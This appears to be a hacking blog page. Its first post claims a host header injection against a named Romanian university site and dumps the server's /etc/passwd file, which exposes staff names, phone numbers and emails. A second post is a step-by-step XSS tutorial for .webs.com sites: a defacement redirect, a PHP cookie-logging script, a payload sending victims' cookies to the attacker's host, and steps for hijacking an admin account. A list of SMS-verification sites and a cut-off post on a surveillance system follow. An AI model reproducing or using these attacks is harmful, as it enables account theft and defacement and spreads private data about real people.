utcluj.ro [vuln]

Target => https://www.utcluj.ro/
Vuln type: Host Header Injection
Passwd file:

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin eaglewatch:x:1001:1002:ovidiu,,,:/usr/local/home/eaglewatch:/bin/bash cristem:x:1002:1003:mihai,,,:/usr/local/home/cristem:/bin/bash deathkiss:x:1003:1004:culda,,,:/usr/local/home/deathkiss:/bin/bash hac3ru:x:1004:1005:silviu,,,:/usr/local/home/hac3ru:/bin/sh ionut:x:1000:1000:ionut,,,:/usr/local/home/ionut:/bin/bash raul:x:1193:1008:Raul Opruta,,,:/usr/local/home/raul:/bin/bash mysql:x:102:104:MySQL Server,,,:/nonexistent:/bin/false messagebus:x:103:106::/var/run/dbus:/bin/false Debian-exim:x:104:107::/var/spool/exim4:/bin/false clamav:x:106:109::/var/lib/clamav:/bin/false ac:x:1011:33::/home/ac:/usr/sbin/nologin acam:x:1102:33:Ivan Mircea,,0264462648,:/home/acam:/usr/sbin/nologin acosmin:x:1025:33::/home/ftp/pub/users/acosmin:/usr/sbin/nologin actamecanica:x:1168:33:,,,,Promovare revista Facultatea de Mecanica:/home/actamecanica:/usr/sbin/nologin adabsolutum:x:1095:33:Adabsolutum,,471,:/home/adabsolutum:/usr/sbin/nologin adems:x:1159:33:Buiga Ovidiu Sorin,,,0746105871,Conferinta ADEMS'11:/home/adems:/usr/sbin/nologin adems09:x:1106:33:Cristina Stanescu,,618,0745854275:/home/adems09:/usr/sbin/nologin ael:x:1050:33::/home/ael:/usr/sbin/nologin aer:x:1098:33:Szoke Eniko,,242,:/home/aer:/usr/sbin/nologin algappl:x:1229:33::/home/algappl:/usr/sbin/nologin alnemad:x:1135:33:Claudia Martis,,1827,,Pentru Proiectul PXXA 811/12(PN II):/home/alnemad:/usr/sbin/nologin amma2013:x:1192:33:Calin Iclodean,,,,Facultatea de mecanica:/home/amma2013:/usr/sbin/nologin armeva261eu:x:1243:33:Nicu Anaca Iulia,,,0722241024,anca.nicu@ethm.utcluj.ro:/home/armeva261eu:/usr/sbin/nologin artens2010:x:1130:33:Adrian BOTEAN (conferinta Tensiometrie 2010),751,,:/home/artens2010:/usr/sbin/nologin astr-cluj:x:1071:33:Astr-Cluj (Dorel Banabic),,,:/home/astr-cluj:/usr/sbin/nologin atflow:x:1226:33:Giurgea Corina,,,0752222732,Departamentul Ingineria Mecanica:/home/atflow:/usr/sbin/nologin auif:x:1250:33:Balc Nicolae,,0264401614,,Responsabil Marius Denes:/home/auif:/usr/sbin/nologin auto:x:1205:33:,,,:/home/auto:/usr/sbin/nologin blr:x:1239:33:Septimiu Crisan,,,,septimiu.crisan@ethm.utcluj.ro, site pt Battle Lab:/home/blr:/usr/sbin/nologin bvencel:x:1180:1011:Biro Vencel,,,:/home/esaform:/bin/bash c4s:x:1175:33:Nasui Mircea,,2365,0740147106:/home/c4s:/usr/sbin/nologin caianu:x:1066:33:Scoala Caianu,,,:/home/caianu:/usr/sbin/nologin cam:x:1023:33:cam.utcluj.ro,,,:/home/cam:/usr/sbin/nologin caman:x:1012:33::/home/caman:/usr/sbin/nologin camin:x:1228:33:Dragos Marian,,,0751224051,Presedinte camin, aplicatie pt camine:/home/camin:/usr/sbin/nologin cardionet:x:1077:33:cardionet,,,:/home/cardionet:/usr/sbin/nologin catomt:x:1112:33:Cristina Stanescu,,,618:/home/catomt:/usr/sbin/nologin ccd:x:1013:33::/home/ccd:/usr/sbin/nologin cemil:x:1026:33:Emil Cebuc:/home/ftp/pub/users/cemil:/usr/sbin/nologin dadarlat:x:1033:33:Vasile Dadarlat:/home/ftp/pub/users/dadarlat:/usr/sbin/nologin cemiva:x:1244:33:Nicu Anca Iulia,,,0722241024,ETHM:/home/cemiva:/usr/sbin/nologin ceprodec:x:1219:33:Sorin Besoiu,,1755,0749140608,Fac Mecanica, MDM, Ioan Ardelean:/home/ceprodec:/usr/sbin/nologin cercetare:x:1037:33::/home/ftp/pub/cercetare:/usr/sbin/nologin certeta:x:1099:33:Dorel Banabic,M205D,747,:/home/certeta:/usr/sbin/nologin cestruct:x:1055:33:Conf. Ciascai Ioan ciascai@ael.utcluj.ro,,809,:/home/cestruct:/usr/sbin/nologin cfdp:x:1084:33:,,,:/home/cfdp:/usr/sbin/nologin cgutcn:x:1001:33:Emil Cebuc,28,246,:/home/cgutcn:/usr/sbin/nologin chisalita:x:1027:1005::/home/ftp/pub/users/chisalita:/usr/sbin/nologin ci579:x:1113:33:Mircea Ancau,,,:/home/ci579:/usr/sbin/nologin ciat:x:1162:33:Calin Iclodean,,2790,0743600321,Nicolae Burnete Arma:/home/ciat:/usr/sbin/nologin civan:x:1028:33:Cosmina Ivan:/home/ftp/pub/users/civan:/usr/sbin/nologin cmrmc:x:1158:33:Sabau Emilia,,0744617491,:/home/cmrmc:/usr/sbin/nologin cnap:x:1014:33::/home/cnap:/bin/bash cnp:x:1223:33:vasile dadarlat,,1247,,vasile dadarlat:/home/cnp:/usr/sbin/nologin comod:x:1146:33:Palaianu Liana,1733,1733,0724209600:/home/comod:/usr/sbin/nologin comodici:x:1201:33:Bogdan Orza,,,,redirectare spre 193.226.17.4/sites/comodici:/home/comodici:/usr/sbin/nologin coroziune:x:1038:33:Horatiu Vermesan,E01,696,:/home/coroziune:/usr/sbin/nologin cpaddd:x:1148:33:Melania Gabriela Ciot,,,:/home/cpaddd:/usr/sbin/nologin cryptorand:x:1131:33:Alin Suciu,Mansarda,1488,:/home/cryptorand:/usr/sbin/nologin csmartis:x:1198:33::/home/csmartis:/usr/sbin/nologin ctcvideoscope:x:1241:33:Anca Ciurte,,,0749657057,Calculatoare:/home/ctcvideoscope:/usr/sbin/nologin cttt:x:1076:33:Cttt,Ctt,,:/home/cttt:/usr/sbin/nologin cv:x:1059:33:Computer Vision,,,:/home/cv:/usr/sbin/nologin cwl:x:1204:33:Vermesan Ioana-Irina,,2384,:/home/cwl:/usr/sbin/nologin cwnp:x:1065:33::/home/cwnp:/usr/sbin/nologin desen:x:1233:33:Andrei Kiraly,,,0742925920,Mecanica, ART:/home/desen:/usr/sbin/nologin desy:x:1231:33:Liviu Miclea,1427,1427,0744311393,Pers de cont Ovidiu Stan int 2366:/home/desy:/usr/sbin/nologin didatec:x:1141:33:Aurel Vlaicu,2204,,,Redirectare spre 193.226.17.4/sites/didatec:/home/didatec:/usr/sbin/nologin dincutav:x:1054:33::/home/dincutav:/usr/sbin/nologin dmcdi:x:1110:33:Departamentmanagementulcercetarii,Daicovociu,0264401766,0745022807:/home/dmcdi:/usr/sbin/nologin dspp:x:1227:33::/home/dspp:/usr/sbin/nologin ecomm:x:1199:33:Bogdan Orza,,,,Redirectare spre 193.226.17.4/sites/ecomm:/home/ecomm:/usr/sbin/nologin eduroam:x:1041:33::/home/eduroam:/usr/sbin/nologin eel:x:1067:33:Horia Balan,Casa galbena,,:/home/eel:/bin/bash een:x:1232:33:Fulea Mircea,,1766,0745022807,mircea.fulea@staff.utcluj.ro:/home/een:/usr/sbin/nologin elbioarch:x:1107:33:Szasz Csaba,,,,mircea.ruba@mae.utcluj.ro:/home/elbioarch:/usr/sbin/nologin electromotion:x:1068:33:Revista Electromotion,,,:/home/electromotion:/usr/sbin/nologin emb:x:1000:33:AEL - Colaborativ,,,:/home/emb:/usr/sbin/nologin emd:x:1172:33:Mircea Ruba,,,0741235546,Site pet Departamentul de Masini si Actionari Electrice:/home/emd:/usr/sbin/nologin emdrc:x:1081:33:EMDRC,,,:/home/emdrc:/usr/sbin/nologin enm:x:1173:33::/home/enm:/usr/sbin/nologin estart:x:1152:33::/home/estart:/usr/sbin/nologin et:x:1048:33:Site-ul Facultatii de Electrotehnica,Laura GRINDEI:/home/et:/usr/sbin/nologin ethm:x:1171:33::/home/ethm:/usr/sbin/nologin etti-admitere:x:1129:33:Lacrimioara Grama,,,:/home/etti-admitere:/usr/sbin/nologin etti:x:1072:33::/home/etti:/usr/sbin/nologin eucomes2010:x:1111:33:Doina Pasla,,0264401684,:/home/eucomes2010:/usr/sbin/nologin fau:x:1086:33:,,,:/home/fau:/usr/sbin/nologin gallery:x:1045:33::/home/gallery:/usr/sbin/nologin gc:x:1083:33:GC,,,:/home/ftp/pub/users/gc:/usr/sbin/nologin greenmining:x:1248:33:Gusat Dorel,,,0721969787,Ingineria CUNBM:/home/greenmining:/usr/sbin/nologin gurzau:x:1007:33:Gurzau,,,:/home/gurzau:/usr/sbin/nologin harmath:x:1070:33:Viorel HARMATH,,,:/home/harmath:/usr/sbin/nologin hitech-hev:x:1189:33:Fodorean Daniel,,1828,,Catedra Masini si Actionari Electrice:/home/hitech-hev:/usr/sbin/nologin hl7:x:1061:33::/home/hl7:/usr/sbin/nologin iccp2010:x:1123:33:Vatavu Andrei,6,484,:/home/iccp2010:/usr/sbin/nologin icdesign:x:1137:33:Marius Neag,,,:/home/icdesign:/usr/sbin/nologin icps13:x:1182:33:,,,:/home/icps13:/usr/sbin/nologin ie:x:1090:33:Inginerie Electrica,,,:/home/ie:/usr/sbin/nologin iedpfc:x:1247:33:Mircea Ruba,,,0741235546,Departamentul Masini si Actionari electrice:/home/iedpfc:/usr/sbin/nologin iit:x:1177:33:Boitor Rozalia,,1837,0743981388:/home/iit:/usr/sbin/nologin im:x:1179:1010:Nicu Anca Iulia,,1425,:/home/im:/bin/bash imadd:x:1230:33:Dan Viorel,,1624,0745696452,Ingiineria Mediului si Antreprenoriatului:/home/imadd:/usr/sbin/nologin imec:x:1206:33:,,,:/home/imec:/usr/sbin/nologin impt:x:1200:33:Bogdan Orza,,,,Redirectare spre 193.226.17.4/sites/impt:/home/impt:/usr/sbin/nologin inndrive:x:1246:33:Mircea Fulea,,,,Proiect elaborat in Centrul de Cercetare RESIN:/home/inndrive:/usr/sbin/nologin innowecs:x:1218:33:innowecs,,,:/home/innowecs:/usr/sbin/nologin instalatii:x:1208:33:Instalatii,,,:/home/instalatii:/usr/sbin/nologin invata-automatica:x:1150:33:Raica Paula,,2368,,Pop Tamas:/home/invata-automatica:/usr/sbin/nologin ionica:x:1203:1009:IOnica,Ionel,,:/home/ftp/ionica/:/usr/sbin/nologin ipm:x:1056:33::/home/ipm:/usr/sbin/nologin ispdc:x:1153:33:Boita Lucian,1221,,,lucian.boita@cs.utcluj.ro:/home/ispdc:/usr/sbin/nologin isse:x:1046:33::/home/isse:/usr/sbin/nologin keg:x:1166:33:,,2389,,Responsabil proiect Prof. Rodica Potolea:/home/keg:/usr/sbin/nologin librarie:x:1132:33:Vlan Vesa,,,:/home/librarie:/usr/sbin/nologin lider:x:1010:33:Lider XXI,,,:/home/lider:/usr/sbin/nologin lmc:x:1245:33:Ioani Monica,,,0264401619,Limbi MOderne:/home/lmc:/usr/sbin/nologin lmn:x:1051:33::/home/lmn:/usr/sbin/nologin marketing:x:1035:33:Management si Margeting - Catana Team:/home/marketing:/usr/sbin/nologin mas:x:1082:33:Catedra de Masurari,,,:/home/mas:/usr/sbin/nologin master-sicas:x:1224:33:Puschita Emanuel,,1915,0744760356,Site Master COM:/home/master-sicas:/usr/sbin/nologin materiale:x:1006:33:Farcas Cristian,321 materiale,,:/home/materiale:/usr/sbin/nologin math:x:1142:1006:Mircea Ivan,1222,,,Site catedra matematica:/home/math:/bin/bash mce:x:1125:33:Bodea Ciprian,,,:/home1/mce:/usr/sbin/nologin mdm:x:1207:33:,,,:/home/mdm:/usr/sbin/nologin mecanica:x:1101:33:Andrei Kiraly,,610,,andrei.kiraly@desen.utcluj.ro:/home/mecanica:/usr/sbin/nologin meditech:x:1094:33:Anca Nicu,,,:/home/meditech:/usr/sbin/nologin MediTech2007:x:1003:1003:Simona VLAD,,,:/home/MediTech2007:/usr/sbin/nologin memm:x:1093:33::/home/memm:/usr/sbin/nologin mie:x:1252:33:Lungu Florin,,,0743055549:/home/mie:/usr/sbin/nologin minas:x:1185:33:Corina Barleanu,,,,Site workshop exploratoriu, Fac de Constr de Masini:/home/minas:/usr/sbin/nologin mosto:x:1157:33:Liana Paraianu,,1747,0724209600,paraianu@tcm.utcluj.ro:/home/mosto:/usr/sbin/nologin msl:x:1057:33::/home/msl:/usr/sbin/nologin mtemconf:x:1221:1004:,,,:/home/mtemconf:/bin/bash multimedia:x:1202:33:Bogdan Orza,,,,Redirectare spre 193.226.17.4/sites/multimedia:/home/multimedia:/usr/sbin/nologin muri:x:1009:33:Catedra de Masini Unelte si Roboti Industriali (MURI),,,:/home/muri:/usr/sbin/nologin nedevschi:x:1029:33::/home/ftp/pub/users/nedevschi:/usr/sbin/nologin nemes:x:1075:33:Ovidiu NEMES,,,:/home/nemes:/usr/sbin/nologin ococ:x:1119:33:Liana Precup,607,338,,office.ococ@ococ.utcluj.ro:/home/ococ:/usr/sbin/nologin ojs:x:1134:1003:OJS Etti,,,:/home/etti/ojs:/bin/bash pcfi:x:1058:33:Cosmin Marcu,Aut,267,:/home/pcfi:/usr/sbin/nologin peculea:x:1039:33:Adrian Peculea:/home/ftp/pub/users/peculea:/usr/sbin/nologin phys:x:1036:33:Radu FECHETE,,401262,,Site Catedra de Fizica:/home/phys:/usr/sbin/nologin polibaschet:x:1005:33:,,,:/home/polibaschet:/usr/sbin/nologin posdru55652:x:1164:33:Rusu Tiberiu,,,:/home/posdru55652:/usr/sbin/nologin prodoc:x:1105:33:Lazea Gheorghe,,,:/home/prodoc:/usr/sbin/nologin psihologie:x:1238:33:Trif Florin,,0745309796,,Departament DSPP:/home/psihologie:/usr/sbin/nologin qdoc:x:1163:33:Qdoc,,,,La cererea dlui Bogdan Orza Redirecrtare spre mm2.ctmed.utcluj.ro/sites/qdoc:/home/qdoc:/usr/sbin/nologin qiem:x:1155:33::/home/qiem:/usr/sbin/nologin renewable-energy:x:1109:33:Dorin Petreus,ETTI BAritiu 26-28,499,:/home/renewable-energy:/usr/sbin/nologin research:x:1220:33:research,,,:/home/research:/usr/sbin/nologin resin:x:1174:33:Mircea Fulea,,1766,,Fac de C-tii Masini:/home/resin:/usr/sbin/nologin revistacpa:x:1088:33:Horatiu Vermesan,,696,:/home/revistacpa:/usr/sbin/nologin roadsafety:x:1085:33:,,,:/home/roadsafety:/usr/sbin/nologin rochi2015:x:1242:33:Stefanut Toader,,1478,0745654555,Site Rochi:/home/rochi2015:/usr/sbin/nologin roedu2008:x:1074:33:RoEduNet Conference 2008,,,:/home/roedu2008:/usr/sbin/nologin romanasul:x:1154:33:Ionel Baciu,E01,,:/home/romanasul:/usr/sbin/nologin rtsp2007:x:1063:33::/home/rtsp2007:/bin/bash satu-mare:x:1254:33:Extensie Satu Mare,,0753042987,,Costin Ioan ovidiu:/home/satu-mare:/usr/sbin/nologin scti:x:1126:33:Vatavu Andrei,6,484,:/home/scti:/usr/sbin/nologin scvc:x:1043:33::/home/scvc:/usr/sbin/nologin se:x:1073:33::/home/se:/usr/sbin/nologin semlet:x:1069:33:Grupul de cercetare CEEX_SEMLET,,,:/home/semlet:/usr/sbin/nologin sensgroup:x:1170:33:Cristin Iosif,,0744252143,,cristin.iosif@gmail.com:/home/sensgroup:/usr/sbin/nologin sic:x:1234:33:Melania Boitor,,,0743981388,Site pt proiect:/home/sic:/usr/sbin/nologin sidoc:x:1145:33:Bogdan Orza,,,,Redirectare catre 193.226.17.4/sites/sidoc:/home/sidoc:/usr/sbin/nologin sim:x:1064:33:Facultatea de SIM (Marius.BODEA@stm.utcluj.ro),,,:/home/sim:/usr/sbin/nologin simimed:x:1124:33:Bogdan Orza,431,309,:/home/simimed:/usr/sbin/nologin sindut:x:1018:33::/home/sindut:/usr/sbin/nologin snom07:x:1060:33:Ovidiu Nemes,SIM,633,:/home/snom07:/usr/sbin/nologin specialmath:x:1240:33:Todea Constantin-Cosmin,,,0747210630,Pagina personla la carte:/home/specialmath:/usr/sbin/nologin speech:x:1253:33:Giurgiu Mircea,,,0742117571:/home/speech:/usr/sbin/nologin sset-etti:x:1151:33:oltean gabriel,,1416,:/home/sset-etti:/usr/sbin/nologin studentsound:x:1114:33:Tripon Daniel,Camin 5 Observator sala 512,,,OSUT:/home/studentsound:/usr/sbin/nologin tcm:x:1225:1007:,,,:/home/tcm/:/bin/bash televiziune:x:1149:33:Aurel Vlaicu,,,,Redirectare spre 193.226.17.4/sites/curs tv:/home/televiziune:/usr/sbin/nologin ticia2015:x:1255:33:Lemnaru Camelia,,1474,,Calculatoare:/home/ticia2015:/usr/sbin/nologin upec2014:x:1181:33:Micu Dan Doru,,,:/home/upec2014:/usr/sbin/nologin utcluj:x:1019:33::/home1/utcluj/newsite:/usr/sbin/nologin vidanel:x:1187:1014:Vidanel Networking,,,:/usr/local/home/vidanel:/bin/bash voxcom:x:1188:33:Buza Ovidiu,,,0744367863,Catedrade Comunicatii:/home/voxcom:/usr/sbin/nologin wheel-ee:x:1139:33:Daniel Fodorean,,1827,,Proiect CNCSIS:/home/wheel-ee:/usr/sbin/nologin wikimosigrid:x:1138:1000:Mosigrid,29,1247,:/home/wikimosigrid:/bin/bash wpad:x:1104:33:,,,:/home/wpad:/usr/sbin/nologin zem:x:1176:33:Besoiu Sorin,,1755,0749140608:/home/zem:/usr/sbin/nologin nutu:x:1008:33:NUtu,,,:/home/nutu:/usr/sbin/nologin ftp:x:105:108:ftp daemon,,,:/srv/ftp:/bin/false tur:x:1015:33:Vlad Vesa,,,0721323046:/home/tur:/usr/sbin/nologin ems:x:1016:33:Claudia Martis,,,0741217272,Masini si Actionari Electrice:/home/ems:/usr/sbin/nologin practicacons:x:1020:33:Marius Lupau,,0740133614,,Constructii civile:/home/practicacons:/usr/sbin/nologin zabbix:x:107:110::/var/lib/zabbix/:/bin/false orca:x:1017:33::/home/orca:/usr/sbin/nologin amcir:x:1021:33:Leordean Vasile Danut,,,0744810091,Ctii de Masini:/home/amcir:/usr/sbin/nologin elimpus:x:1022:33:Fodorean Danie,,,,ETH:/home/elimpus:/usr/sbin/nologin sdc:x:1024:33:Marius Lupou,,,0740133614,Constructii:/home/sdc:/usr/sbin/nologin pact:x:1030:33:Marius Lupou,,,0740133614,Constructii:/home/pact:/usr/sbin/nologin nmr:x:1031:33:Ardelean Ioan,,,0743347176,Ingineria Materialelor:/home/nmr:/usr/sbin/nologin espesa:x:1032:33:Nicu Anca Iulia,,1328,0722241024,ETHM:/home/espesa:/usr/sbin/nologin snom_2016:x:1040:33:Birleanu Corina,,2878,0740270188,Constructii de masini - simpozion:/home/snom_2016:/usr/sbin/nologin sdimm:x:1034:33:Ciontea Lelia,,1475,:/home/sdimm:/usr/sbin/nologin mecatronica-info:x:1042:33:Vistrian Maties,,1682,0749140608,Depart MDM:/home/mecatronica-info:/usr/sbin/nologin car:x:1044:33:Corina Dan,,1991,0740415162,Pentru casa de ajutor reciproc:/home/car:/usr/sbin/nologin cnae2016:x:1047:33:Cristea Ciprian,],0740103553,,Inginerie electrica:/home/cnae2016:/usr/sbin/nologin art:x:1049:33:,,,0743600321,Iclodean Calin Mecanica ART:/home/art:/usr/sbin/nologin urbivel:x:1052:33:Nicu Anca Iulia,,1328,,ORCA:/home/urbivel:/usr/sbin/nologin microinv:x:1053:33:Nicu Anca Iulia,,1328,,ORCA:/home/microinv:/usr/sbin/nologin parteneric:x:1062:33:marius neag,,,:/home/parteneric:/usr/sbin/nologin nmr4:x:1078:33:Fechete Radu,,,0741770595,Fizica si Chimie:/home/nmr4:/usr/sbin/nologin physchem:x:1079:33:Fechete Radu,,,0741770595,Ficica si Chimie:/home/physchem:/usr/sbin/nologin cester:x:1080:33:Doina Pisla,,1684,,Doina Pisla Proiect Agewell:/home/cester:/usr/sbin/nologin naposip:x:1087:33:Botond Kirei,,,:/home/naposip:/usr/sbin/nologin set4cip:x:1089:33:set4cip,,,:/home/set4cip:/usr/sbin/nologin optidep:x:1091:33::/home/optidep:/usr/sbin/nologin 96bg:x:1092:1009:96bg,,,,UtCLUJ:/home/96bg:/bin/bash premco:x:1096:33:Popan Ioan Alexandru,,,0742994767,Constructii de Masini:/home/premco:/usr/sbin/nologin viper:x:1097:33:Fodorean Daniel,,,,Proiect 38BG/2016:/home/viper:/usr/sbin/nologin subsoil:x:1100:33:Lungu,,,:/home/subsoil:/usr/sbin/nologin ipr:x:1103:33:Mocan Bogdan,,,0766254191,Constructid e masini:/home/ipr:/usr/sbin/nologin 3dmsl:x:1108:1012:Neamtu Calin,,,0740258225,Constructiid e Masini:/home/3dmsl:/bin/bash monit:x:1115:33:monitorizare ccd,,,:/home/monit:/usr/sbin/nologin heibus:x:1116:1013:Lapusan Petru Ciprian,,1756,0478215377:/home/heibus:/bin/bash epe:x:1117:33:Teodosescu Petre,,,0745999406:/home/epe:/usr/sbin/nologin utcntransport:x:1120:33:Martis Claudia,0264401827,,,Inginerie Electrica:/home/utcntransport:/usr/sbin/nologin etti-master:x:1118:33:Stan Adriana,,2452,:/home/etti-master:/usr/sbin/nologin simtech:x:1121:1015:Simtech,Stinta materialelor,0264401621,,Decan:/home/simtech:/bin/bash phdetti:x:1122:33:Mircea Giurgiu,,,0742117571,ScoalaDoctorala:/home/phdetti:/usr/sbin/nologin phdmath:x:1127:33:Gavrea Bogdan,,,0749594273,Matematica:/home/phdmath:/usr/sbin/nologin ifm2e:x:1128:33:Redirectare MDM,,,:/home/ifm2e:/usr/sbin/nologin r5cop:x:1133:33:Muresan Mircea Paul,,,0743044037:/home/cv/r5cop:/usr/sbin/nologin rjtsam:x:1140:33:\Dorel Banabic,,,,Site revista Romanian Journal of Technical Sciences:/home/rjtsam:/usr/sbin/nologin atnamam:x:1136:33:Calin Neamtu,M412,,:/home/atnamam:/usr/sbin/nologin dacit:x:1143:33:Calin Neamtu,M412,,:/home/dacit:/usr/sbin/nologin cty:x:1144:1017:,,,:/home/cty:/bin/bash smarteducation:x:1147:33:Sorin Besoiu,,1682,0749140608:/home/smarteducation:/usr/sbin/nologin electrosummer:x:1156:33:Anca Iulia Nicu,,0264401328,:/home/electrosummer:/usr/sbin/nologin gdgi:x:1160:33:Scurtu Iacob Liviu,,,0761140448,Mecanica:/home/gdgi:/usr/sbin/nologin elupu:x:1161:33:Eugen Lupu,,,,Site personal cursuri:/home/elupu:/usr/sbin/nologin cs:x:1165:33:,,,:/home/cs:/usr/sbin/nologin alumni:x:1167:33:Calin Cenan,,,:/home/alumni:/usr/sbin/nologin salietti:x:1169:33:Adriana Stan,,0264202452,:/home/salietti:/usr/sbin/nologin radio:x:1178:1018:,,,:/home/radio:/bin/bash ikl:x:1183:1019:,,,:/home/ikl:/bin/bash sitetest:x:1184:33:Iakel,,,:/home/sitetest:/usr/sbin/nologin multispect:x:1186:33:Muresan Mircea Paul,,,0743044037:/home/cv/multispect:/usr/sbin/nologin pph2020:x:1190:33:Muresan Mircea Paul,,,0743044037:/home/cv/pph2020:/usr/sbin/nologin zappu:x:1191:1022:,,,:/home/zappu:/bin/bash interact:x:1194:33:Nicu Anca Iulia,,0722241024,:/home/interact:/usr/sbin/nologin rochi2018:x:1195:33:Stefanut Teodor Traian,,0745651555,:/home/rochi2018:/usr/sbin/nologin vladvoicu:x:1196:1023:,,,:/home/vladvoicu:/bin/bash c65:x:1197:33:Marius Lupou,,,0740133614:/home/c65:/usr/sbin/nologin consilierefie:x:1209:33:Stet Denisa,,,0753682191:/home/consilierefie:/usr/sbin/nologin

Thanks !

Read More

Hacking Any .webs.com website with Cross Site Scripting! (XSS)

Things Need While Preforming this attack:
• A VPN! Safety First!
• Knowledge of Cross Site Scripting
•A active .webs.com website

Step 1.
Sign up on your webs.com target website and make any username.

Step 2.
Go to "Edit Profile" or anywhere so you can change your name.

The name changing place should look like this:


Step 3.
Change your username to <script>alert("XSS")</script>

Once you've done that visit your profile. When you do you'll see a prompt that pops up and it should say "XSS" depending on what you put in the script.

Step 4.
If you'd like to deface, You will type in <script>window.location="http://LinkToYourDefaceHere.com/"</script>

Once you've saved that, refresh your profile. You should be redirected to your deface website/page.
To upload your deface just go to http://www.pastehtml.com/ and paste your deface source code there. Then where it says "LinkToYourDefaceHere" you'll put your pastehtml link.

Hacking the Admin's account!

Things Need While Preforming this attack:
• A Cookie Stealing Script
• Knowledge of Cross Site Scripting
•A retarded admin.

Step 1.
Go to http://www.000webhost.com/ and make a website or something.

Step 2.
Create 1 file in your websites file manager. Make sure it is a .php file.
The name can be whatever you'd like. For this example we'll put "Bella.php"

Step 3.
Now, inside of Bella.php you need to put the following code:

Quote: <?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}
function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}
logData();
?>

Step 4.
Now, go to "www.yoursite.com/Bella.php". You should get a blank page.
If not, it's whatever.
Then you need to go back into your file manager.
If you see "log.txt" the cookie stealing operation worked!
Just go ahead and delete the "log.txt".

Step 5.
Go to your targets website and change your username to:
<script>location.href = 'http://www.yoursite.com/Bella.php?cookie='+document.cookie;</script>

Step 6.
Send your profile link to the admin of the site.
Once he clicked on it check your File Manager...

You should have a log.txt file.. Inside of it is the admins cookie!!
I don't want to explain it, but look up a tutorial on google on how to switch cookies..

Step 7.
Once you've switched out the cookies you refresh the page and you should be logged into the admin account!

Have fun owning admins!

This isn't only for the admin account.. It's for anyone who clicks on your profile!
Also, you can't change the Admin's password because you need there password in order to do so..

so, go to the place where you change your username. Then click on "Edit Account"
Change the email to YOUR email..
Then sign out and try to re-sign in.. Then click forgot password.
Then you reset the password and you'll have access to the account and the Admin won't!!

Read More

SMS Verification Sites

http://receive-sms.com/
http://www.k7.net/
http://lleida.net/uk/
http://sms-verification.com/
http://receive-sms-online.com/
http://pinger.com
http://www.smsverification.co.uk
http://www.twilio.com/
https://www.tropo.com
http://www.textnow.com (by LittleFighter)
http://receivesmsonline.com/freephonenumber/
http://www.receivesmsonline.com/
http://www.simser.info
http://www.youtxt.com/free-web-sms
http://www.youtextmessage.com/
http://www.411sms.com/freesms

Read More

The Most Advanced Surveillance System I Have Ever Seen! [Video]

This is quite possibly the most advanced automatic surveillance system I've seen to date - it's incredible, if a little unnerving!

Baz Edwards   Oct 16, 2017

---

What you can see from the video below is definitely the most advanced real-time surveillance system I have ever seen.
It's quite possibly the best object recognition system I've seen too.
I've dabbled in computer vision before, so I know first hand how difficult it is to get a computer to recognise objects in images when all it sees is monstrous array of numbers!
That's what makes this system so impressive.  It really does look like something from another world.  Check it out:

So what are we looking at here? 

Well, it's basically CCTV footage of a road in China and at first glance, it appears to be carrying out surveillance on everybody that comes into view of the camera.
This amazing system is the work of a Chinese computer vision startup called SenseTime.  The software is a visual scenario analytics system - basically a very sophisticated object detection system which uses deep neural networks (AI) to classify moving objects as either people, cars, buses or any other entity.
What makes this system remarkable is that it can even detect gender, clothing and the different types of vehicle that it's looking at, all in real time.
You'll also notice that it can even detect objects when they are occluding each other.  For example when a person walks side-by-side with another person, the software still manages to distinguish them both and is able to draw bounding boxes around two people.  This I think is absolutely amazing.

What does the text mean next to each person?

I can't be certain, as I can't read the language (maybe someone can help me out here?), but there's a lot of speculation on Reddit that the text boxes are descriptors that are a result of the object classification algorithm.  In other words, the algorithm is classifying each object as being a man, woman, adult etc.  It also seems to pick up on items of clothing too and their color.
Here's an English version of the same system, which is equally as impressive:

What is the system used for?

